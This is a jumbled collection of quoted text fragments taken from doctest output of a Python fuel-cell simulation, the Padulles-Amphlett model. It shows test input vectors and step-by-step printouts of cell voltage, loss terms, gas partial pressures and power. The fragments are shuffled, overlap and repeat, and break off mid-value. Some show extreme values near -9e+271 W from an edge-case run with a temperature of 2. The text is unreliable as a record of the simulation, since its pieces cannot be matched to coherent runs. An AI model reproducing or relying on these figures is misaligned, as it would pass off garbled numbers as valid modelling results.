>>> Padulles_Amphlett_Data[\"Status\"] True >>> Padulles_Amphlett_Data[\"P\"][5]", "V FC Efficiency : 0.5271753860695316 FC Power : 8.635132823818928 W FC Voltage :", "PH2O : 0.24251022540940706 atm PO2 : 0.19054704025631486 atm Power-Thermal : 1.9954235329963377 W ###########", "atm Power-Thermal : 1.3645077216348895 W ########### I : 0.9 E : 6.068403196908046 V", "FC Power : -3.757170500110593e+272 W FC Voltage : -9.392926250276482e+271 V Loss : 1.8785852500552963e+271", ": 4.4443653479563885 V Loss : 0.324807877394268 V PH2 : 0.19707238966150117 atm PH2O :", "atm PH2O : 0.24226811507480747 atm PO2 : 0.19043598052153862 atm Power-Thermal : 5.249386015321152 W", "Ohmic : 9.331810347802308e+270 V FC Efficiency : -5.981929710129684e+270 FC Power : -9.331810347802308e+271 W", "0.0001762905810800498 V Eta Ohmic : 0.0015834606415773538 V FC Efficiency : 0.5646650099463304 FC Power", ": 0.5600666527156857 FC Power : 4.368519891182348 W FC Voltage : 4.368519891182348 V Loss", "0.19049151038892673 atm Power-Thermal : 3.5712130804699886 W ########### I : 1.9 E : 6.068387813188879", ": 7.516043371344917 W ########### I : 3.5 E : 6.068363185907339 V Eta Activation", ": 3.9083739857013544 V Loss : 0.4319972241282524 V PH2 : 0.1966649285946839 atm PH2O :", "4.041762851824391 W ########### I : 2.1 E : 6.068384735676256 V Eta Activation :", "W FC Voltage : 4.4443653479563885 V Loss : 0.324807877394268 V PH2 : 0.19707238966150117", "0.5422224856637728 FC Power : 6.344003082266143 W FC Voltage : 4.229335388177429 V Loss :", "W ########### I : 3.4 E : 6.06836472559345 V Eta Activation : 0.4190844003836543", "0.24218164709816473 atm PO2 : 0.19039631633054707 atm Power-Thermal : 6.49540141236458 W ########### I :", "atm PO2 : 0.19039631633054707 atm Power-Thermal : 6.49540141236458 W ########### I : 3.1", ": 8.29401625290499 W ########### I : 3.8 E : 6.068358566463993 V Eta Activation", "Power : 12.316313453731704 W FC Voltage : 3.9730043399134525 V Loss : 0.4190730008706778 V", 
"Ohmic : 0.002644278024175193 V FC Efficiency : 0.5422224856637728 FC Power : 6.344003082266143 W", ": 0.3041956781419353 V Eta Concentration : 0.00011729309032954864 V Eta Ohmic : 0.0010546098289093816 V", "FC Power : 4.368519891182348 W FC Voltage : 4.368519891182348 V Loss : 0.3399763535283976", "13.035960331860592 W FC Voltage : 3.950291009654725 V Loss : 0.42361505111213504 V PH2 :", "Eta Activation : 0.39318591119501267 V Eta Concentration : 0.00045476978327314626 V Eta Ohmic :", "0.1903883834923488 atm Power-Thermal : 6.748686546268298 W ########### I : 3.2 E : 6.068367804773196", "Eta Activation : 0.3310434726426763 V Eta Concentration : 0.0001762905810800498 V Eta Ohmic :", "Efficiency : 0.5600666527156857 FC Power : 4.368519891182348 W FC Voltage : 4.368519891182348 V", "Efficiency : 0.49857958703411753 FC Power : 15.166791037577857 W FC Voltage : 3.888920778866117 V", "I : 3.8 E : 6.068358566463993 V Eta Activation : 0.4264559863331208 V Eta", ": 0.2420432983355364 atm PO2 : 0.19033285362496066 atm Power-Thermal : 8.555574184086693 W ########### I", "########### I : 1.3 E : 6.068397044188998 V Eta Activation : 0.35539503345654255 V", "Efficiency : 0.5250728373249665 FC Power : 9.010249888496427 W FC Voltage : 4.095568131134739 V", "1.9 E : 6.068387813188879 V Eta Activation : 0.38052969267197334 V Eta Concentration :", "FC Voltage : 4.335978606366966 V Loss : 0.3464843028619262 V PH2 : 0.197030238516658 atm", "W FC Voltage : 3.950291009654725 V Loss : 0.42361505111213504 V PH2 : 0.19672113012114145", "Power-Thermal : 7.774225509105296 W ########### I : 3.6 E : 6.068361646157063 V Eta", ": 6.068373962362936 V Eta Activation : 0.40621862980268425 V Eta Concentration : 0.000555512176140013 V", ": 0.19705833927988675 atm PH2O : 0.24254481260006414 atm PO2 : 0.19056290593271147 atm Power-Thermal :", "W ########### I : 2.6 E : 6.068377040773017 V Eta Activation : 0.40130847825734167", "I : 0.4 E : 6.068410886366294 V Eta Activation : 0.27735002084480426 V 
Eta", ": 0.00041466432635066115 V Eta Ohmic : 0.0037092867838082735 V FC Efficiency : 0.5271753860695316 FC", "PO2 : 0.19051530890352164 atm Power-Thermal : 2.8809969177338575 W ########### I : 1.6 E", "Concentration : 5.853018266659147e-05 V Eta Ohmic : 0.0005267910327125488 V FC Efficiency : 0.6120471438396443", "E : 6.0683862744646095 V Eta Activation : 0.3839273955127959 V Eta Concentration : 0.00039465233709598025", ": 5.562302489345107 W FC Voltage : 4.27869422257316 V Loss : 0.3579405643231677 V PH2", "FC Voltage : 3.9614863490169867 V Loss : 0.4213762911512418 V PH2 : 0.19673518050275585 atm", ": 0.6 E : 6.0684078107750326 V Eta Activation : 0.3041956781419353 V Eta Concentration", "V Eta Ohmic : 0.004065229504538212 V FC Efficiency : 0.5230579622427114 FC Power :", ">>> Padulles_Amphlett_Data=Dynamic_Analysis(InputMethod=Test_Vector, TestMode=True) ########### Padulles-Amphlett-Model Simulation ########### Analyzing . . . I :", ": 5.004572056867657 W ########### I : 2.5 E : 6.068378579881878 V Eta Activation", ": 4.335978606366966 V Loss : 0.3464843028619262 V PH2 : 0.197030238516658 atm PH2O :", "0.2422162342888218 atm PO2 : 0.19041218200694368 atm Power-Thermal : 5.992791140958347 W ########### I :", "9.331810347802308e+270 V PH2 : 0.19690378508212852 atm PH2O : 0.2423545830514502 atm PO2 : 0.19047564471253012", "FC Efficiency : 0.49857958703411753 FC Power : 15.166791037577857 W FC Voltage : 3.888920778866117", "I : 0.2 E : 6.068413961701556 V Eta Activation : 0.23146009851376736 V Eta", "Power : -9.331810347802308e+271 W FC Voltage : -4.665905173901154e+271 V Loss : 9.331810347802308e+270 V", "PH2 : 0.19673518050275585 atm PH2O : 0.24214705990750765 atm PO2 : 0.19038045065415046 atm Power-Thermal", "8.555574184086693 W ########### I : 3.9 E : 6.068357026521189 V Eta Activation :", "V Loss : 0.40912283407888206 V PH2 : 0.19680543241082776 atm PH2O : 0.24223352788415034 atm", "V Eta Ohmic : 0.006750024222922298 V FC Efficiency : 0.49981193710908595 FC 
Power :", "4.206975801412199 V Loss : 0.37228332551300575 V PH2 : 0.19695998660858605 atm PH2O : 0.24242375743276434", "E : 6.068384735676256 V Eta Activation : 0.38715939375662295 V Eta Concentration : 0.00041466432635066115", "0.49981193710908595 FC Power : 14.814425815913308 W FC Voltage : 3.8985331094508706 V Loss :", "PO2 : 0.19049944322712503 atm Power-Thermal : 3.338951337284836 W ########### I : 1.8 E", "atm PH2O : 0.2424064638374358 atm PO2 : 0.19049944322712503 atm Power-Thermal : 3.338951337284836 W", "3.338951337284836 W ########### I : 1.8 E : 6.068389351849069 V Eta Activation :", "V Eta Concentration : 0.0005960022064159204 V Eta Ohmic : 0.005314768076451755 V FC Efficiency", ": 0.5 E : 6.068409348602667 V Eta Activation : 0.2921240370409447 V Eta Concentration", "4.909163097279392 V Loss : 0.23185017288443285 V PH2 : 0.1971566919511875 atm PH2O : 0.24266586776736396", ": 0.00047486339861378836 V Eta Ohmic : 0.004243378155424144 V FC Efficiency : 0.5211232875604884 FC", "V PH2 : 0.19694593622697168 atm PH2O : 0.2424064638374358 atm PO2 : 0.19049944322712503 atm", ": 2.9 E : 6.068372423061707 V Eta Activation : 0.4085437792118771 V Eta Concentration", "PH2 : 0.19711454080634436 atm PH2O : 0.24261398698137834 atm PO2 : 0.1905946372855047 atm Power-Thermal", "Padulles-Amphlett-Model Simulation ########### Analyzing . . . 
I : 0.1 E : 6.14455344314445", "Power : 12.676756316854359 W FC Voltage : 3.9614863490169867 V Loss : 0.4213762911512418 V", "atm Power-Thermal : 7.774225509105296 W ########### I : 3.6 E : 6.068361646157063 V", "6.068381657907269 V Eta Activation : 0.39318591119501267 V Eta Concentration : 0.00045476978327314626 V Eta", "E : 6.068361646157063 V Eta Activation : 0.4228725100457559 V Eta Concentration : 0.0007181421727400468", "atm Power-Thermal : 6.24342366379814 W ########### I : 3.0 E : 6.0683708836963435 V", "atm PO2 : 0.19057877160910808 atm Power-Thermal : 1.1623111227088154 W ########### I : 0.8", "0.55589469312397 FC Power : 4.769576467003663 W FC Voltage : 4.335978606366966 V Loss :", "V PH2 : 0.19673518050275585 atm PH2O : 0.24214705990750765 atm PO2 : 0.19038045065415046 atm", "W FC Voltage : 4.27869422257316 V Loss : 0.3579405643231677 V PH2 : 0.19700213775342923", "Ohmic : 0.0054937518419525275 V FC Efficiency : 0.5093595307581349 FC Power : 12.316313453731704 W", "atm PH2O : 0.2426831613626925 atm PO2 : 0.1906263686382979 atm Power-Thermal : 2.3185876665375803e+269 W", "E : 6.0684154992732005 V Eta Activation : 0.18557231242539243 V Eta Concentration : 1.948431634418616e-05", "atm PO2 : 0.1905867044473064 atm Power-Thermal : 0.9650580567185031 W ########### I : 0.7", "V Loss : 0.36304537588899266 V PH2 : 0.19698808737181484 atm PH2O : 0.24245834462342142 atm", "atm Power-Thermal : 0.7735460064675803 W ########### I : 0.6 E : 6.0684078107750326 V", "6.06839550584913 V Eta Activation : 0.36030304442922906 V Eta Concentration : 0.00027514614569545357 V Eta", "Concentration : 7.809186891953766e-05 V Eta Ohmic : 0.0007026162388380664 V FC Efficiency : 0.5997124668722417", "Eta Ohmic : 0.0007026162388380664 V FC Efficiency : 0.5997124668722417 FC Power : 1.8711028966413943", "PH2 : 0.19704428889827239 atm PH2O : 0.2425275190047356 atm PO2 : 0.1905549730945132 atm Power-Thermal", "Eta Ohmic : 0.0022902088041253615 V FC Efficiency : 0.5485505413555333 FC Power 
: 5.562302489345107", "Loss : 0.4358872495310143 V PH2 : 0.19663682783145514 atm PH2O : 0.24202600474020786 atm PO2", "Eta Concentration : 0.00047486339861378836 V Eta Ohmic : 0.004243378155424144 V FC Efficiency :", "0.40130847825734167 V Eta Concentration : 0.0005151327744999589 V Eta Ohmic : 0.004600031286563196 V FC", ": 0.36304537588899266 V PH2 : 0.19698808737181484 atm PH2O : 0.24245834462342142 atm PO2 :", "Concentration : 1.1361117401857817e-07 V Eta Ohmic : 4.63717533307516e+269 V FC Efficiency : -2.9725482904327946e+269", "V Eta Ohmic : 0.00017548304819292376 V FC Efficiency : 0.6589203974773784 FC Power :", "Eta Ohmic : 0.0012307785370829418 V FC Efficiency : 0.5755840434599239 FC Power : 3.1426888772911847", "V Eta Activation : 0.36914696409844006 V Eta Concentration : 0.0003148742658730733 V Eta Ohmic", "V FC Efficiency : -2.9725482904327946e+269 FC Power : -2.3185876665375803e+269 W FC Voltage :", "5.004572056867657 W ########### I : 2.5 E : 6.068378579881878 V Eta Activation :", "0.5124481138904448 FC Power : 11.591576336201861 W FC Voltage : 3.997095288345469 V Loss :", "V Loss : 9.331810347802308e+270 V PH2 : 0.19690378508212852 atm PH2O : 0.2423545830514502 atm", "W FC Voltage : -9.392926250276482e+271 V Loss : 1.8785852500552963e+271 V PH2 : 0.19662277744984075", "0.1906263686382979 atm Power-Thermal : 0.1010420899676448 W ########### I : 0.2 E : 6.068413961701556", ": 0.5108802815228812 FC Power : 11.95459858763542 W FC Voltage : 3.9848661958784737 V Loss", "7.879484179737301 W FC Voltage : 4.147096936703843 V Loss : 0.38425817529700723 V PH2 :", "FC Power : -9.331810347802308e+271 W FC Voltage : -4.665905173901154e+271 V Loss : 9.331810347802308e+270", "Power-Thermal : 1.781480108817652 W ########### I : 1.1 E : 6.068400120676597 V Eta", "0.42817767789163225 V Eta Concentration : 0.0007795927885366656 V Eta Ohmic : 0.006929978850845375 V FC", "2.2 E : 6.068383196823811 V Eta Activation : 0.39024111055794025 V Eta Concentration :", 
"0.0006366034731784721 V Eta Ohmic : 0.005672855976278701 V FC Efficiency : 0.507882865258588 FC Power", "V FC Efficiency : 0.5023661507925354 FC Power : 14.106441514254398 W FC Voltage :", "Voltage : -9.392926250276482e+271 V Loss : 1.8785852500552963e+271 V PH2 : 0.19662277744984075 atm PH2O", ": 0.19031698794856405 atm Power-Thermal : 3.757170500110593e+272 W ########### Report is generating ... Warning", "Eta Activation : 0.3648724409731032 V Eta Concentration : 0.0002949968562774962 V Eta Ohmic :", "########### I : 1.9 E : 6.068387813188879 V Eta Activation : 0.38052969267197334 V", ": 6.068389351849069 V Eta Activation : 0.3769483587657406 V Eta Concentration : 0.0003547094700620668 V", "PH2 : 0.19672113012114145 atm PH2O : 0.2421297663121791 atm PO2 : 0.19037251781595219 atm Power-Thermal", "V Eta Ohmic : 0.0060314264601405215 V FC Efficiency : 0.5050511549266622 FC Power :", "Eta Ohmic : 0.004243378155424144 V FC Efficiency : 0.5211232875604884 FC Power : 9.755427943132343", ": 0.19672113012114145 atm PH2O : 0.2421297663121791 atm PO2 : 0.19037251781595219 atm Power-Thermal :", "E : 6.068404734927729 V Eta Activation : 0.3232442167420945 V Eta Concentration : 0.00015659857042988755", "Concentration : 0.0001762905810800498 V Eta Ohmic : 0.0015834606415773538 V FC Efficiency : 0.5646650099463304", "PH2 : 0.19694593622697168 atm PH2O : 0.2424064638374358 atm PO2 : 0.19049944322712503 atm Power-Thermal", "atm PH2O : 0.24254481260006414 atm PO2 : 0.19056290593271147 atm Power-Thermal : 1.5710516301767605 W", "PO2 : 0.19047564471253012 atm Power-Thermal : 4.041762851824391 W ########### I : 2.1 E", ": 0.19046771187433184 atm Power-Thermal : 4.279867176181073 W ########### I : 2.2 E :", ": 5.495727044129421 W ########### I : 2.7 E : 6.068375501600038 V Eta Activation", "0.19665087821306954 atm PH2O : 0.2420432983355364 atm PO2 : 0.19033285362496066 atm Power-Thermal : 8.555574184086693", "Padulles_Amphlett_Data[\"PH2\"][5] 0.19710049042472996 >>> 
Padulles_Amphlett_Data[\"PH2O\"][5] 0.2425966933860498 >>> Padulles_Amphlett_Data[\"Ph\"][5] 0.9650580567185031 >>> Padulles_Amphlett_Data[\"VE\"][5] 4.553525621759973 >>> Padulles_Amphlett_Data[\"V0\"]", "PH2O : 0.24219894069349326 atm PO2 : 0.1904042491687454 atm Power-Thermal : 6.24342366379814 W ###########", ">>> Test_Vector={\"A\":50.6,\"l\":0.0178,\"lambda\":23,\"JMax\":1.5,\"T\":2,\"N0\":5,\"KO2\":0.0000211,\"KH2\":0.0000422,\"KH2O\":0.000007716,\"tH2\":3.37,\"tO2\":6.74,\"t1\":2,\"t2\":2,\"tH2O\":18.418,\"rho\":1.168,\"qMethanol\":0.0002,\"CV\":2,\"i-start\":5,\"i-stop\":0.1,\"i-step\":-2,\"Name\":\"Test\"} >>> Padulles_Amphlett_Data=Dynamic_Analysis(InputMethod=Test_Vector, TestMode=True) ########### Padulles-Amphlett-Model Simulation ########### Analyzing . . .", "8.635132823818928 W FC Voltage : 4.111968011342347 V Loss : 0.3912833448667819 V PH2 :", "Eta Activation : 0.4038089891176398 V Eta Concentration : 0.0005353086845364485 V Eta Ohmic :", ": 14.106441514254398 W FC Voltage : 3.918455976181777 V Loss : 0.4299811339950573 V PH2", "W ########### I : 0.2 E : 6.068413961701556 V Eta Activation : 0.23146009851376736", "V PH2 : 0.19707238966150117 atm PH2O : 0.24256210619539273 atm PO2 : 0.1905708387709098 atm", "Eta Activation : 0.3769483587657406 V Eta Concentration : 0.0003547094700620668 V Eta Ohmic :", "0.7 E : 6.068406272883388 V Eta Activation : 0.31440243547871893 V Eta Concentration :", "Eta Concentration : 0.0005353086845364485 V Eta Ohmic : 0.004778536276705824 V FC Efficiency :", ": 0.004957160562216277 V FC Efficiency : 0.5140663396997094 FC Power : 11.227208859041653 W FC", "PH2 : 0.19695998660858605 atm PH2O : 0.24242375743276434 atm PO2 : 0.19050737606532336 atm Power-Thermal", "4.111968011342347 V Loss : 0.3912833448667819 V PH2 : 0.19688973470051413 atm PH2O : 0.24233728945612165", "PH2 : 0.19710049042472996 atm PH2O : 0.2425966933860498 atm PO2 : 0.1905867044473064 atm Power-Thermal", "atm PO2 : 0.19045184619793523 atm Power-Thermal : 
4.761340157365757 W ########### I : 2.4", "V Eta Activation : 0.3769483587657406 V Eta Concentration : 0.0003547094700620668 V Eta Ohmic", "Ohmic : 0.002113348284589288 V FC Efficiency : 0.5520748042471996 FC Power : 5.1674201677537885 W", "FC Voltage : 4.229335388177429 V Loss : 0.3678117158535559 V PH2 : 0.19697403699020044 atm", "W ########### I : 0.4 E : 6.068410886366294 V Eta Activation : 0.27735002084480426", ": 0.24264857417203542 atm PO2 : 0.1906105029619013 atm Power-Thermal : 0.41280968341523216 W ########### I", "Power : 1.4321903165847678 W FC Voltage : 4.7739677219492265 V Loss : 0.25888894042333943 V", "atm PH2O : 0.24244105102809288 atm PO2 : 0.19051530890352164 atm Power-Thermal : 2.8809969177338575 W", "Voltage : 4.253168626404167 V Loss : 0.36304537588899266 V PH2 : 0.19698808737181484 atm PH2O", "4.677757241603485 V Loss : 0.27813072895256186 V PH2 : 0.19712859118795872 atm PH2O : 0.24263128057670688", "Eta Ohmic : 0.00017548304819292376 V FC Efficiency : 0.6589203974773784 FC Power : 0.5139579100323552", ": 0.5901164085980564 FC Power : 2.30145399353242 W FC Voltage : 4.60290798706484 V Loss", "########### I : 2.8 E : 6.068373962362936 V Eta Activation : 0.40621862980268425 V", ": 9.331810347802308e+271 W ########### I : 4.0 E : 6.144553093215826 V Eta Activation", "E : 6.068372423061707 V Eta Activation : 0.4085437792118771 V Eta Concentration : 0.0005757433248249061", "Loss : 0.380479323755368 V PH2 : 0.19693188584535729 atm PH2O : 0.24238917024210727 atm PO2", "Voltage : 3.997095288345469 V Loss : 0.4142554269432475 V PH2 : 0.196777331647599 atm PH2O", ": 0.5520748042471996 FC Power : 5.1674201677537885 W FC Voltage : 4.306183473128157 V Loss", "W FC Voltage : 3.9393990084279658 V Loss : 0.4257931434330969 V PH2 : 0.19670707973952706", "Voltage : 3.888920778866117 V Loss : 0.4358872495310143 V PH2 : 0.19663682783145514 atm PH2O", "0.3 E : 6.068412424065923 V Eta Activation : 0.2583036192079603 V Eta Concentration :", ": 0.0006977152837847073 
V Eta Ohmic : 0.006210893371826288 V FC Efficiency : 0.5036913732928463 FC", "I : 0.6 E : 6.0684078107750326 V Eta Activation : 0.3041956781419353 V Eta", "4.165992733072229 V Loss : 0.380479323755368 V PH2 : 0.19693188584535729 atm PH2O : 0.24238917024210727", ": 0.19053117457991825 atm Power-Thermal : 2.432697510654893 W ########### I : 1.4 E :", "0.24219894069349326 atm PO2 : 0.1904042491687454 atm Power-Thermal : 6.24342366379814 W ########### I :", "V PH2 : 0.1966930293579127 atm PH2O : 0.24209517912152204 atm PO2 : 0.19035665213955555 atm", "4.4443653479563885 V Loss : 0.324807877394268 V PH2 : 0.19707238966150117 atm PH2O : 0.24256210619539273", ": 1.1623111227088154 W ########### I : 0.8 E : 6.068404734927729 V Eta Activation", "atm Power-Thermal : 3.1088387177404826 W ########### I : 1.7 E : 6.068390890445182 V", ": 4.165992733072229 V Loss : 0.380479323755368 V PH2 : 0.19693188584535729 atm PH2O :", "Eta Ohmic : 0.004778536276705824 V FC Efficiency : 0.5157386322058496 FC Power : 10.861455594255196", "Loss : 0.4319972241282524 V PH2 : 0.1966649285946839 atm PH2O : 0.24206059193086493 atm PO2", ": 4.041762851824391 W ########### I : 2.1 E : 6.068384735676256 V Eta Activation", ": 0.6589203974773784 FC Power : 0.5139579100323552 W FC Voltage : 5.1395791003235525 V Loss", "0.49857958703411753 FC Power : 15.166791037577857 W FC Voltage : 3.888920778866117 V Loss :", "Eta Ohmic : 0.005135904406545483 V FC Efficiency : 0.5124481138904448 FC Power : 11.591576336201861", ": 0.24219894069349326 atm PO2 : 0.1904042491687454 atm Power-Thermal : 6.24342366379814 W ########### I", "0.4038089891176398 V Eta Concentration : 0.0005353086845364485 V Eta Ohmic : 0.004778536276705824 V FC", "FC Power : 15.166791037577857 W FC Voltage : 3.888920778866117 V Loss : 0.4358872495310143", "2.301179808139826e-06 V Eta Ohmic : 9.331810347802308e+270 V FC Efficiency : -5.981929710129684e+270 FC Power", "FC Power : 11.227208859041653 W FC Voltage : 4.0097174496577335 V Loss : 
0.41173130254104057", ": 7.259039668139408 W ########### I : 3.4 E : 6.06836472559345 V Eta Activation", "0.19060257012370302 atm Power-Thermal : 0.588897103358606 W ########### I : 0.5 E : 6.068409348602667", "0.1010420899676448 W ########### I : 0.2 E : 6.068413961701556 V Eta Activation :", "PH2 : 0.19690378508212852 atm PH2O : 0.2423545830514502 atm PO2 : 0.19047564471253012 atm Power-Thermal", "V PH2 : 0.1967632812659846 atm PH2O : 0.24218164709816473 atm PO2 : 0.19039631633054707 atm", "V Eta Activation : 0.18557231242539243 V Eta Concentration : 1.948431634418616e-05 V Eta Ohmic", "E : 6.0683708836963435 V Eta Activation : 0.4107901672807063 V Eta Concentration : 0.0005960022064159204", "V Eta Ohmic : 0.0024671853140681515 V FC Efficiency : 0.5452780290261753 FC Power :", "0.9 E : 6.068403196908046 V Eta Activation : 0.3310434726426763 V Eta Concentration :", ": 0.3731623911228729 V Eta Concentration : 0.0003347784463987542 V Eta Ohmic : 0.0029988129062160497 V", ": 6.068409348602667 V Eta Activation : 0.2921240370409447 V Eta Concentration : 9.76794818682758e-05 V", "V Eta Ohmic : 0.003176255519565377 V FC Efficiency : 0.5341016324451575 FC Power :", "0.3157701467791963 V PH2 : 0.19708644004311557 atm PH2O : 0.24257939979072127 atm PO2 : 0.19057877160910808", ": The value of I(>0.1) leads to minus amount of V, please check", "Eta Activation : 0.31440243547871893 V Eta Concentration : 0.00013693276339445145 V Eta Ohmic :", "Efficiency : 0.5050511549266622 FC Power : 13.393956628655083 W FC Voltage : 3.9393990084279658 V", "V Eta Ohmic : 0.004243378155424144 V FC Efficiency : 0.5211232875604884 FC Power :", ": 3.997095288345469 V Loss : 0.4142554269432475 V PH2 : 0.196777331647599 atm PH2O :", "PO2 : 0.19046771187433184 atm Power-Thermal : 4.279867176181073 W ########### I : 2.2 E", ": 4.206975801412199 V Loss : 0.37228332551300575 V PH2 : 0.19695998660858605 atm PH2O :", ": 10.12561398467885 W FC Voltage : 4.05024559387154 V Loss : 0.4036265972020676 V PH2", 
": 0.3524430218673324 V PH2 : 0.1970161881350436 atm PH2O : 0.24249293181407852 atm PO2 :", "Concentration : 0.000555512176140013 V Eta Ohmic : 0.004957160562216277 V FC Efficiency : 0.5140663396997094", "0.2583036192079603 V Eta Concentration : 5.853018266659147e-05 V Eta Ohmic : 0.0005267910327125488 V FC", "I : 4.0 E : 6.144553093215826 V Eta Activation : 0.9106431331307118 V Eta", "FC Voltage : -4.665905173901154e+271 V Loss : 9.331810347802308e+270 V PH2 : 0.19690378508212852 atm", "########### Analyzing . . . I : 0.1 E : 6.0684154992732005 V Eta", "atm PH2O : 0.24251022540940706 atm PO2 : 0.19054704025631486 atm Power-Thermal : 1.9954235329963377 W", ": 3.2 E : 6.068367804773196 V Eta Activation : 0.41506683170178466 V Eta Concentration", "Voltage : 3.9083739857013544 V Loss : 0.4319972241282524 V PH2 : 0.1966649285946839 atm PH2O", "E : 6.06839550584913 V Eta Activation : 0.36030304442922906 V Eta Concentration : 0.00027514614569545357", "6.0683862744646095 V Eta Activation : 0.3839273955127959 V Eta Concentration : 0.00039465233709598025 V Eta", "PH2O : 0.24230270226546458 atm PO2 : 0.19045184619793523 atm Power-Thermal : 4.761340157365757 W ###########", "FC Efficiency : 0.569790429225178 FC Power : 3.555492278365111 W FC Voltage : 4.4443653479563885", "FC Power : 13.393956628655083 W FC Voltage : 3.9393990084279658 V Loss : 0.4257931434330969", "Concentration : 0.0007590808465813247 V Eta Ohmic : 0.006750024222922298 V FC Efficiency : 0.49981193710908595", "I : 2.0 E : 6.144553272737403 V Eta Activation : 0.9103753288368093 V Eta", "4.0097174496577335 V Loss : 0.41173130254104057 V PH2 : 0.1967913820292134 atm PH2O : 0.2422162342888218", "V PH2 : 0.19693188584535729 atm PH2O : 0.24238917024210727 atm PO2 : 0.19049151038892673 atm", "V PH2 : 0.19687568431889974 atm PH2O : 0.2423199958607931 atm PO2 : 0.1904597790361335 atm", "I : 2.1 E : 6.068384735676256 V Eta Activation : 0.38715939375662295 V Eta", 
"Padulles_Amphlett_Data=Dynamic_Analysis(InputMethod=Test_Vector, TestMode=True) ########### Padulles-Amphlett-Model Simulation ########### Analyzing . . . I : 0.1", "0.18576727978992955 V PH2 : 0.19717074233280188 atm PH2O : 0.2426831613626925 atm PO2 : 0.1906263686382979", "E : 6.068387813188879 V Eta Activation : 0.38052969267197334 V Eta Concentration : 0.0003746674093630815", "FC Power : 7.879484179737301 W FC Voltage : 4.147096936703843 V Loss : 0.38425817529700723", ": 0.2426831613626925 atm PO2 : 0.1906263686382979 atm Power-Thermal : 0.1010420899676448 W ########### I", "V Eta Activation : 0.23146009851376736 V Eta Concentration : 3.899435456560147e-05 V Eta Ohmic", "2.724941943281497 W FC Voltage : 4.541569905469162 V Loss : 0.30536758106117423 V PH2 :", "V Loss : 0.27813072895256186 V PH2 : 0.19712859118795872 atm PH2O : 0.24263128057670688 atm", ": 0.3464843028619262 V PH2 : 0.197030238516658 atm PH2O : 0.24251022540940706 atm PO2 :", ": 0.39318591119501267 V Eta Concentration : 0.00045476978327314626 V Eta Ohmic : 0.004065229504538212 V", "V Loss : 0.40642364231840483 V PH2 : 0.19681948279244216 atm PH2O : 0.2422508214794789 atm", "atm Power-Thermal : 8.29401625290499 W ########### I : 3.8 E : 6.068358566463993 V", "V Eta Concentration : 0.0003347784463987542 V Eta Ohmic : 0.0029988129062160497 V FC Efficiency", "atm PH2O : 0.2426831613626925 atm PO2 : 0.1906263686382979 atm Power-Thermal : 0.1010420899676448 W", ": 0.9650580567185031 W ########### I : 0.7 E : 6.068406272883388 V Eta Activation", "Padulles_Amphlett_Data[\"K\"] -0.24133551559100302 >>> Padulles_Amphlett_Data=Dynamic_Analysis(InputMethod={}, TestMode=True, PrintMode=False) >>> Padulles_Amphlett_Data[\"Status\"] False >>> Vcell_Calc(Enernst=4.5, Loss=0.4, N=4)", "2.9 E : 6.068372423061707 V Eta Activation : 0.4085437792118771 V Eta Concentration :", "0.23146009851376736 V Eta Concentration : 3.899435456560147e-05 V Eta Ohmic : 0.0003510800160998837 V FC", "atm PH2O : 0.2421297663121791 
atm PO2 : 0.19037251781595219 atm Power-Thermal : 7.259039668139408 W", "E : 6.068413961701556 V Eta Activation : 0.23146009851376736 V Eta Concentration : 3.899435456560147e-05", "0.3041956781419353 V Eta Concentration : 0.00011729309032954864 V Eta Ohmic : 0.0010546098289093816 V FC", "Concentration : 0.0001960088652678871 V Eta Ohmic : 0.0017599744011013664 V FC Efficiency : 0.5600666527156857", ": 0.003176255519565377 V FC Efficiency : 0.5341016324451575 FC Power : 7.498786919530012 W FC", "1.8785852500552963e+271 V FC Efficiency : -1.2042213141380103e+271 FC Power : -3.757170500110593e+272 W FC Voltage", "atm PO2 : 0.19051530890352164 atm Power-Thermal : 2.8809969177338575 W ########### I : 1.6", "6.144553093215826 V Eta Activation : 0.9106431331307118 V Eta Concentration : 4.6654999364844955e-06 V Eta", ": 0.24254481260006414 atm PO2 : 0.19056290593271147 atm Power-Thermal : 1.5710516301767605 W ########### I", "Loss : 0.18576727978992955 V PH2 : 0.19717074233280188 atm PH2O : 0.2426831613626925 atm PO2", "Power-Thermal : 0.41280968341523216 W ########### I : 0.4 E : 6.068410886366294 V Eta", "atm PO2 : 0.19048357755072845 atm Power-Thermal : 3.8055158202626993 W ########### I : 2.0", "Efficiency : 0.5485505413555333 FC Power : 5.562302489345107 W FC Voltage : 4.27869422257316 V", "FC Efficiency : 0.5520748042471996 FC Power : 5.1674201677537885 W FC Voltage : 4.306183473128157", "Efficiency : 0.507882865258588 FC Power : 12.676756316854359 W FC Voltage : 3.9614863490169867 V", "0.9092187394310518 V Eta Concentration : 1.1361117401857817e-07 V Eta Ohmic : 4.63717533307516e+269 V FC", "4.229335388177429 V Loss : 0.3678117158535559 V PH2 : 0.19697403699020044 atm PH2O : 0.24244105102809288", ": 0.25888894042333943 V PH2 : 0.19714264156957312 atm PH2O : 0.24264857417203542 atm PO2 :", "PO2 : 0.190420114845142 atm Power-Thermal : 5.7435444057448075 W ########### I : 2.8 E", "6.068357026521189 V Eta Activation : 0.42817767789163225 V Eta Concentration : 
0.0007795927885366656 V Eta", ": 1.7 E : 6.068390890445182 V Eta Activation : 0.3731623911228729 V Eta Concentration", "3.9083739857013544 V Loss : 0.4319972241282524 V PH2 : 0.1966649285946839 atm PH2O : 0.24206059193086493", "0.1906263686382979 atm Power-Thermal : 2.3185876665375803e+269 W ########### I : 2.0 E : 6.144553272737403", "FC Efficiency : 0.5393558719759229 FC Power : 6.731161282259518 W FC Voltage : 4.206975801412199", "Loss : 0.30536758106117423 V PH2 : 0.19710049042472996 atm PH2O : 0.2425966933860498 atm PO2", "import shutil >>> Test_Vector={\"A\":50.6,\"l\":0.0178,\"lambda\":23,\"JMax\":1.5,\"T\":343,\"N0\":5,\"KO2\":0.0000211,\"KH2\":0.0000422,\"KH2O\":0.000007716,\"tH2\":3.37,\"tO2\":6.74,\"t1\":2,\"t2\":2,\"tH2O\":18.418,\"rho\":1.168,\"qMethanol\":0.0002,\"CV\":2,\"i-start\":0.1,\"i-stop\":4,\"i-step\":0.1,\"Name\":\"Test\"} >>> Padulles_Amphlett_Data=Dynamic_Analysis(InputMethod=Test_Vector, TestMode=True) ########### Padulles-Amphlett-Model Simulation ########### Analyzing .", "0.324807877394268 V PH2 : 0.19707238966150117 atm PH2O : 0.24256210619539273 atm PO2 : 0.1905708387709098", "FC Efficiency : 0.5600666527156857 FC Power : 4.368519891182348 W FC Voltage : 4.368519891182348", ": 0.0037092867838082735 V FC Efficiency : 0.5271753860695316 FC Power : 8.635132823818928 W FC", ": 3.6 E : 6.068361646157063 V Eta Activation 